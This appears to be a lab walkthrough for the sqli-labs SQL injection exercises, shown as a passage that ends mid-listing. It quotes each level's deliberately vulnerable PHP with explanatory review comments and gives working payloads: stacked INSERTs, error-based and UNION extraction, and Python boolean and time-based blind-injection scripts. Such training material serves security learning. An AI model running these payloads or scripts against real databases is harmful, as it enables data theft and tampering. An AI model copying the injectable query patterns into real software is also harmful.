    // mysqli_multi_query() runs every ';'-separated statement in $sql; a single lookup
    // belongs in mysqli_query() or, better, a prepared statement. The password is
    // compared in clear, so the column must hold it unhashed.
    $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
    if (@mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if($result = @mysqli_store_result($con1))
        {
            if($row = @mysqli_fetch_row($result))
            {
                if ($row[1])
                {
                    return $row[1];
                }
                else
                {
                    return 0;
                }
            }
            // No row: falls through and returns NULL.
        }
        else
        {
            // Database error text returned to the client.
            echo '<font size="5" color= "#FFFF00">';
            print_r(mysqli_error($con1));
            echo "</font>";
        }
    }
    else
    {
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
}


payload: login_password=1';insert into users values('42','laotun','123456')--+&login_user=1&mysubmit=Login





// Less-43 login helper: identical to Less-42 except both values sit inside ('...') in
// the SQL string. Returns $row[1], 0 when that column is empty, or NULL when no row
// matched (implicit fall-through).
function sqllogin($host,$dbuser,$dbpass, $dbname){
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
    // NOTE(review): login_user is escaped, login_password is concatenated as received;
    // escaping runs before the connection is checked.
    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
    $password = $_POST["login_password"];
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");
    }
    /* execute multi query */
    // mysqli_multi_query() runs every ';'-separated statement; use mysqli_query() with a
    // prepared statement for a single lookup. Password compared in clear.
    $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
    if (@mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if($result = @mysqli_store_result($con1))
        {
            if($row = @mysqli_fetch_row($result))
            {
                if ($row[1])
                {
                    return $row[1];
                }
                else
                {
                    return 0;
                }
            }
            // No row: falls through and returns NULL.
        }
        else
        {
            // Database error text returned to the client.
            echo '<font size="5" color= "#FFFF00">';
            print_r(mysqli_error($con1));
            echo "</font>";
        }
    }
    else
    {
        echo '<font size="5" color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
}


payload: login_password=1');insert into users values('43','laotun','123456')--+&login_user=1&mysubmit=Login





// Less-44 login helper: same query shape as Less-42, but neither failure path prints
// mysqli_error(), so the caller sees only $row[1], 0, or NULL (blind). The security
// properties are unchanged: only login_user is escaped, login_password is concatenated
// as received, and the whole string runs through mysqli_multi_query().
function sqllogin($host,$dbuser,$dbpass, $dbname){
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
    // Escaping runs before the connection check below.
    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
    $password = $_POST["login_password"];
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");
    }
    /* execute multi query */
    // A single lookup belongs in mysqli_query() with a prepared statement; password is compared in clear.
    $sql = "SELECT * FROM users WHERE username='$username' and password='$password'";
    if (@mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if($result = @mysqli_store_result($con1))
        {
            if($row = @mysqli_fetch_row($result))
            {
                if ($row[1])
                {
                    return $row[1];
                }
                else
                {
                    return 0;
                }
            }
            // No row: falls through and returns NULL.
        }
    }
    // No error output on any failure path.
}

这个与Less-42一样,payload: login_password=1';insert into users values('44','laotun','123456')--+&login_user=1&mysubmit=Login




// Less-45 login helper: Less-44 with both values inside ('...'). No error output on any
// failure path (blind); returns $row[1], 0, or NULL (implicit fall-through).
function sqllogin($host,$dbuser,$dbpass, $dbname){
    // connectivity
    //mysql connections for stacked query examples.
    $con1 = mysqli_connect($host,$dbuser,$dbpass, $dbname);
    // Only login_user is escaped; login_password is concatenated as received. Escaping
    // runs before the connection check below.
    $username = mysqli_real_escape_string($con1, $_POST["login_user"]);
    $password = $_POST["login_password"];
    // Check connection
    if (mysqli_connect_errno($con1))
    {
        echo "Failed to connect to MySQL: " . mysqli_connect_error();
    }
    else
    {
        @mysqli_select_db($con1, $dbname) or die ( "Unable to connect to the database ######: ");
    }
    /* execute multi query */
    // mysqli_multi_query() runs every ';'-separated statement; a single lookup belongs in
    // mysqli_query() with a prepared statement. Password is compared in clear.
    $sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
    if (@mysqli_multi_query($con1, $sql))
    {
        /* store first result set */
        if($result = @mysqli_store_result($con1))
        {
            if($row = @mysqli_fetch_row($result))
            {
                if ($row[1])
                {
                    return $row[1];
                }
                else
                {
                    return 0;
                }
            }
            // No row: falls through and returns NULL.
        }
    }
    // No error output on any failure path.
}

这一关是在Less-44的基础上加了一个括号,闭合即可,payload: login_password=1');insert into users values('45','laotun','123456')--+&login_user=1&mysubmit=Login




// Less-46-style listing: ?sort= is interpolated into the ORDER BY clause. That position
// takes an identifier or expression, so quoting or escaping the value would not help;
// the defence is an allow-list of permitted column names (or a fixed map from request
// value to column). On success the whole users table, passwords included, is rendered.
$id=$_GET['sort'];   // read before the isset() check; undefined-index notice/warning when the parameter is absent
if(isset($id))
{
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    $sql = "SELECT * FROM users ORDER BY $id";
    $result = mysql_query($sql);
    if ($result)
    {
        ?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
        <?php
        // Every row is echoed without htmlspecialchars().
        while ($row = mysql_fetch_assoc($result))
        {
            echo '<font color= "#00FF11" size="3">';
            echo "<tr>";
            echo "<td>".$row['id']."</td>";
            echo "<td>".$row['username']."</td>";
            echo "<td>".$row['password']."</td>";
            echo "</tr>";
            echo "</font>";
        }
        echo "</table>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}

这一关考的是order by注入,这里可以使用报错注入,也可以使用布尔盲注






# Boolean-based blind probe for the ORDER BY sink quoted above: each request asks one
# yes/no question (is character i of the target greater than j?) and reads the answer
# from whether a fixed HTML fragment appears in the page. Detection angle for defenders:
# one client issuing a long run of requests that differ only in two integers, roughly
# seven per recovered character (binary search over ASCII 31..127).
import requests

url = ""    # target URL template (left blank on the page); consumed by `url % sql`
flag = ''   # characters recovered so far; appended to by exp()


def payload(i, j):
    """Return 1 if the oracle page answers "true" for (position i, threshold j), else 0."""
    # database name
    sql = "rand(ascii(substr(database(),%d,1))>%d)"%(i,j)
    # table names
    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # column names
    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # flag lookup
    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)

    #r = requests.post(url, data)
    r = requests.request('GET', url % sql)
    # print (r.url)
    # The oracle is a literal row-order fragment of the lab's HTML; presumably the rows
    # come back in this order only for one truth value. Brittle: any markup change breaks it.
    if "<font color= \"#00FF11\" size=\"3\"><tr><td>11</td><td>admin3</td><td>admin3</td></tr></font><font color= \"#00FF11\" size=\"3\"><tr><td>5</td><td>stupid</td><td>stupidity</td>" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover the target one character at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # Landing on either search boundary is taken to mean there are no more characters.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()



// Less-47-style listing: ?sort= is interpolated inside single quotes in the ORDER BY
// clause. A quoted value there is a string constant (ordering by a constant is a no-op),
// and the value is still not escaped inside the quotes. The fix is the same as for the
// unquoted variant: map the request value onto an allow-list of column names.
$id=$_GET['sort'];   // read before the isset() check; undefined-index notice/warning when absent
if(isset($id))
{
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    $sql = "SELECT * FROM users ORDER BY '$id'";
    $result = mysql_query($sql);
    if ($result)
    {
        ?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
        <?php
        // Every row, password included, is echoed without htmlspecialchars().
        while ($row = mysql_fetch_assoc($result))
        {
            echo '<font color= "#00FF11" size="3">';
            echo "<tr>";
            echo "<td>".$row['id']."</td>";
            echo "<td>".$row['username']."</td>";
            echo "<td>".$row['password']."</td>";
            echo "</tr>";
            echo "</font>";
        }
        echo "</table>";
    }
    else
    {
        // Database error text returned to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysql_error());
        echo "</font>";
    }
}



1'and (updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))--+



// Less-48-style listing: as Less-46 (?sort= interpolated bare into ORDER BY) but with no
// else branch, so a failing query renders nothing (blind). The ORDER BY position takes an
// identifier/expression; escaping does not apply — allow-list the column name instead.
$id=$_GET['sort'];   // read before the isset() check; undefined-index notice/warning when absent
if(isset($id))
{
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    $sql = "SELECT * FROM users ORDER BY $id";
    $result = mysql_query($sql);
    if ($result)
    {
        ?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
        <?php
        // Every row, password included, is echoed without htmlspecialchars().
        while ($row = mysql_fetch_assoc($result))
        {
            echo '<font color= "#00FF11" size="3">';
            echo "<tr>";
            echo "<td>".$row['id']."</td>";
            echo "<td>".$row['username']."</td>";
            echo "<td>".$row['password']."</td>";
            echo "</tr>";
            echo "</font>";
        }
        echo "</table>";
    }
    // No error branch: query failures are silent.
}


# Boolean-based blind probe for the ORDER BY sink quoted above (same script as for the
# earlier level): each request asks one yes/no question and reads the answer from whether
# a fixed HTML fragment appears. Detection angle: one client issuing a long run of
# requests that differ only in two integers, roughly seven per recovered character.
import requests

url = ""    # target URL template (left blank on the page); consumed by `url % sql`
flag = ''   # characters recovered so far; appended to by exp()


def payload(i, j):
    """Return 1 if the oracle page answers "true" for (position i, threshold j), else 0."""
    # database name
    sql = "rand(ascii(substr(database(),%d,1))>%d)"%(i,j)
    # table names
    #sql = "1')) and ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # column names
    #sql = "1')) and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d--+"%(i,j)
    # flag lookup
    #sql = "1')) and ascii(substr((select password from users),%d,1))>%d--+"%(i,j)

    #r = requests.post(url, data)
    r = requests.request('GET', url % sql)
    # print (r.url)
    # The oracle is a literal row-order fragment of the lab's HTML; presumably the rows
    # come back in this order only for one truth value. Brittle: any markup change breaks it.
    if "<font color= \"#00FF11\" size=\"3\"><tr><td>11</td><td>admin3</td><td>admin3</td></tr></font><font color= \"#00FF11\" size=\"3\"><tr><td>5</td><td>stupid</td><td>stupidity</td>" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    """Recover the target one character at a time by binary search over ASCII 31..127."""
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        # Landing on either search boundary is taken to mean there are no more characters.
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()



// Less-49-style listing: ?sort= inside single quotes in ORDER BY (a string constant, so
// the sort is a no-op) with no else branch — failures render nothing (blind). Map the
// request value onto an allow-list of column names instead of interpolating it.
$id=$_GET['sort'];   // read before the isset() check; undefined-index notice/warning when absent
if(isset($id))
{
    //logging the connection parameters to a file for analysis.
    // NOTE(review): raw input appended to result.txt; readable by clients if under the web root.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    $sql = "SELECT * FROM users ORDER BY '$id'";
    $result = mysql_query($sql);
    if ($result)
    {
        ?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
        <?php
        // Every row, password included, is echoed without htmlspecialchars().
        while ($row = mysql_fetch_assoc($result))
        {
            echo '<font color= "#00FF11" size="3">';
            echo "<tr>";
            echo "<td>".$row['id']."</td>";
            echo "<td>".$row['username']."</td>";
            echo "<td>".$row['password']."</td>";
            echo "</tr>";
            echo "</font>";
        }
        echo "</table>";
    }
    // No error branch: query failures are silent.
}


# Time-based blind PoC for the quoted ORDER BY '$id' level shown above: the
# probe closes the quote and appends if(<cond>, sleep(5), -1), so a slow
# response means the condition held.
import requests
import time
url = ""
flag = ''


def payload(i: int, j: int) -> int:
    """Return 1 if character i of the probed value has an ASCII code > j, else 0.

    The oracle is wall-clock time only: a response slower than 5 s counts as
    true. A request exception (including the 10 s timeout) is swallowed and,
    because only the elapsed time is checked, also counts as true; r is never
    used.
    """
    startTime=time.time()
    # database name
    sql = "1'and if(ascii(substr(database(),%d,1))>%d,sleep(5),-1)-- "%(i,j)
    # table names
    #sql = "id = if(ascii(substr((select group_concat(table_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # column names
    #sql = "id = if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database()),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    # query the flag
    #sql = "id = if(ascii(substr((select password from users),%d,1))>%d,sleep(5),-1)%%23"%(i,j)
    try:
        # url is expected to contain a single %s placeholder for the probe.
        r = requests.get(url % sql, timeout=10)
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt.
        pass
    # print (r.url)
    if time.time()-startTime>5:
        res = 1
    else:
        res = 0
    return res


def exp() -> None:
    """Recover the probed string one character at a time, printing progress.

    Each position costs about seven payload() calls (bisection of 31..127),
    every true branch of which holds a server connection for 5 s. The loop
    stops when the resolved code is 31 or 127, i.e. no character matched.
    Note for defenders: the level logs every sort value to result.txt, so the
    complete probe sequence is recorded server-side.
    """
    global flag
    for i in range(1, 10000):
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        # After the loop low == high + 1, so f is simply low.
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


# Runs on import.
exp()



// Sort column read straight from the query string and never validated.
// $con1 (the mysqli connection) is defined outside this block.
$id=$_GET['sort'];
if(isset($id)){
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the raw value is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    // Vulnerable line: $id is interpolated unquoted into ORDER BY, and the
    // statement is run through mysqli_multi_query(), so a ';' in the input
    // appends a second, arbitrary statement (the INSERT payload shown below
    // this block demonstrates it). Fix: compare $id against an allow-list of
    // column names and execute the single statement with mysqli_query().
    $sql="SELECT * FROM users ORDER BY $id";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
<?php
        /* store first result set */
        // Only the first result set is rendered; an appended statement still
        // executes even though nothing from it is displayed.
        if ($result = mysqli_store_result($con1))
        {
            while($row = mysqli_fetch_row($result))
            {
                // Cells are printed without htmlspecialchars(); the password
                // column is shown in clear.
                echo '<font color= "#00FF11" size="3">';
                echo "<tr>";
                echo "<td>";
                printf("%s", $row[0]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[1]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[2]);
                echo "</td>";
                echo "</tr>";
                echo "</font>";
            }
        }
        echo "</table>";
    }
    else
    {
        // The raw database error is reflected to the client, which also
        // enables error-based extraction.
        echo '<font color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
}


1;insert into users values('50','laotun','123456')



// Sort column read straight from the query string and never validated.
// $con1 (the mysqli connection) is defined outside this block.
$id=$_GET['sort'];
if(isset($id)){
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the raw value is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    // Vulnerable line: $id sits inside single quotes, so a quote in the input
    // breaks out of the literal; because the statement goes through
    // mysqli_multi_query(), a following ';' appends a second statement (the
    // stacked INSERT shown below this block). Fix: allow-list the column name
    // and run the single statement with mysqli_query().
    $sql="SELECT * FROM users ORDER BY '$id'";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
<?php
        /* store first result set */
        // Only the first result set is rendered; an appended statement still
        // executes even though nothing from it is displayed.
        if ($result = mysqli_store_result($con1))
        {
            while($row = mysqli_fetch_row($result))
            {
                // Cells are printed without htmlspecialchars(); the password
                // column is shown in clear.
                echo '<font color= "#00FF11" size="3">';
                echo "<tr>";
                echo "<td>";
                printf("%s", $row[0]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[1]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[2]);
                echo "</td>";
                echo "</tr>";
                echo "</font>";
            }
        }
        echo "</table>";
    }
    else
    {
        // The raw database error is reflected to the client.
        echo '<font color= "#FFFF00">';
        print_r(mysqli_error($con1));
        echo "</font>";
    }
}


1';insert into users values('51','laotun','123456')--+



// Sort column read straight from the query string and never validated.
// $con1 (the mysqli connection) is defined outside this block.
$id=$_GET['sort'];
if(isset($id)){
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the raw value is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    // Vulnerable line: $id is interpolated unquoted into ORDER BY and run
    // through mysqli_multi_query(), so a ';' in the input appends a second
    // statement (the stacked INSERT shown below this block). Unlike the earlier
    // multi-query level there is no else branch: a failed query renders
    // nothing, so no error text is reflected. Fix: allow-list the column name
    // and use mysqli_query().
    $sql="SELECT * FROM users ORDER BY $id";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
<?php
        /* store first result set */
        // Only the first result set is rendered; an appended statement still
        // executes even though nothing from it is displayed.
        if ($result = mysqli_store_result($con1))
        {
            while($row = mysqli_fetch_row($result))
            {
                // Cells are printed without htmlspecialchars(); the password
                // column is shown in clear.
                echo '<font color= "#00FF11" size="3">';
                echo "<tr>";
                echo "<td>";
                printf("%s", $row[0]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[1]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[2]);
                echo "</td>";
                echo "</tr>";
                echo "</font>";
            }
        }
        echo "</table>";
    }
}


1;insert into users values('52','laotun','123456')



// Sort column read straight from the query string and never validated.
// $con1 (the mysqli connection) is defined outside this block.
$id=$_GET['sort'];
if(isset($id)){
    //logging the connection parameters to a file for analysis.
    // NOTE(review): the raw value is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'SORT:'.$id."\n");
    fclose($fp);
    // Vulnerable line: $id sits inside single quotes, so a quote in the input
    // breaks out of the literal, and mysqli_multi_query() then lets a ';'
    // append a second statement (the stacked INSERT shown below this block).
    // No else branch: a failed query renders nothing and reflects no error.
    // Fix: allow-list the column name and use mysqli_query().
    $sql="SELECT * FROM users ORDER BY '$id'";
    /* execute multi query */
    if (mysqli_multi_query($con1, $sql))
    {
?>
        <center>
        <font color= "#00FF00" size="4">
        <table   border=1'>
        <tr>
            <th> ID </th>
            <th> USERNAME   </th>
            <th> PASSWORD   </th>
        </tr>
        </font>
        </font>
<?php
        /* store first result set */
        // Only the first result set is rendered; an appended statement still
        // executes even though nothing from it is displayed.
        if ($result = mysqli_store_result($con1))
        {
            while($row = mysqli_fetch_row($result))
            {
                // Cells are printed without htmlspecialchars(); the password
                // column is shown in clear.
                echo '<font color= "#00FF11" size="3">';
                echo "<tr>";
                echo "<td>";
                printf("%s", $row[0]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[1]);
                echo "</td>";
                echo "<td>";
                printf("%s", $row[2]);
                echo "</td>";
                echo "</tr>";
                echo "</font>";
            }
        }
        echo "</table>";
    }
}


1';insert into users values('53','laotun','123456')--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt — a server-side
    // record of the attack, and a data leak if the file is web-reachable.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() are called after output has already been
    // echoed, so unless output buffering is enabled they fail with
    // "headers already sent" — TODO confirm the php.ini this lab runs with.
    // $pag is interpolated into the header; confirm it is not user-controlled.
    if($tryyy >= ($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is placed inside single quotes, so a quote in the
    // input terminates the literal. ext/mysql has no parameter binding; the
    // fix is a prepared statement (mysqli/PDO) or, since id is numeric, (int)$id.
    $sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Row values are echoed unescaped and include the stored password, so
        // whatever row the query returns is displayed directly.
        echo '<font color= "#00FFFF">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Error text is not reflected (print_r is commented out); a failed
        // query yields an empty yellow block.
        echo '<font color= "#FFFF00">';
        //print_r(mysql_error());
        echo "</font>";
    }
}



20'union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+




爆列：20'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


查询数据：20'union select 1,secret_SCJK,3 from doejyhjijk--+




// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >=($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        echo "<br>\n";
        header( "refresh:4;url=../sql-connections/setup-db-challenge.php?id=$pag" );
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is interpolated inside parentheses with no quoting
    // at all, so any expression in the input is evaluated as SQL. Fix: a
    // prepared statement (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=($id) LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Row values are echoed unescaped and include the stored password.
        echo '<font color= "#00FFFF">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Error text is not reflected (print_r is commented out).
        echo '<font color= "#FFFF00">';
//               print_r(mysql_error());
        echo "</font>";
    }
}


爆表：20)union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+


爆列：20)union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


查询key：20)union select 1, secret_U0PJ,3 from 1etlst22aa--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >=($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Querry DB to get the correct output
    // Vulnerable line: $id is wrapped in ('...'); a quote in the input ends
    // the literal and the parenthesis is then trivially closed. Wrapping is
    // not escaping — use a prepared statement (mysqli/PDO) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=('$id') LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Row values are echoed unescaped and include the stored password.
        echo '<font color= "#00FFFF">';
        echo 'Your Login name:'. $row['username'];
        echo "<br>";
        echo 'Your Password:' .$row['password'];
        echo "</font>";
    }
    else
    {
        // Error text is not reflected (print_r is commented out).
        echo '<font color= "#FFFF00">';
//               print_r(mysql_error());
        echo "</font>";
    }
}


爆表：20')union select 1,group_concat(table_name),3 from information_schema.columns where table_schema=database()--+


爆列：20')union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database()--+


查询key：20')union select 1,group_concat(secret_6E9J),3 from pfn2gwm7ps--+



// Challenge level: the id parameter is read, logged, counted against an
// attempt limit and then interpolated into the query without validation.
// $times, $pag, next_tryy() and view_attempts() are defined outside this block.
if(isset($_GET['id']))
{
    $id=$_GET['id'];
    //logging the connection parameters to a file for analysis.
    // NOTE(review): every raw probe is appended to result.txt.
    $fp=fopen('result.txt','a');
    fwrite($fp,'ID:'.$id."\n");
    fclose($fp);
    //update the counter in database
    next_tryy();
    //Display attempts on screen.
    $tryyy = view_attempts();
    echo "You have made : ". $tryyy ." of $times attempts";
    echo "<br><br><br>\n";
    //Reset the Database if you exceed allowed attempts.
    // The reset expires the 'challenge' cookie and redirects to the setup page.
    // setcookie() and header() run after output has already been echoed, so
    // unless output buffering is enabled they fail with "headers already
    // sent" — TODO confirm the php.ini this lab runs with.
    if($tryyy >=($times+1))
    {
        setcookie('challenge', ' ', time() - 3600000);
        echo "<font size=4>You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset </font><br>\n";
        echo "Redirecting you to challenge page..........\n";
        header( "refresh:3;url=../sql-connections/setup-db-challenge.php?id=$pag" );
        echo "<br>\n";
    }
    // Wrapping the value in double quotes is not escaping: a '"' in the input
    // still terminates the literal.
    $id= '"'.$id.'"';
    // Querry DB to get the correct output
    // Vulnerable line: the quoted-but-unescaped $id is interpolated directly.
    // Fix: a prepared statement (mysqli/PDO — ext/mysql cannot bind) or (int)$id.
    $sql="SELECT * FROM security.users WHERE id=$id LIMIT 0,1";
    $result=mysql_query($sql);
    // If the query failed, $result is false and this call emits a warning.
    $row = mysql_fetch_array($result);
    if($row)
    {
        // Row values are echoed unescaped and include the stored password.
        echo '<font color= "#00FFFF">';
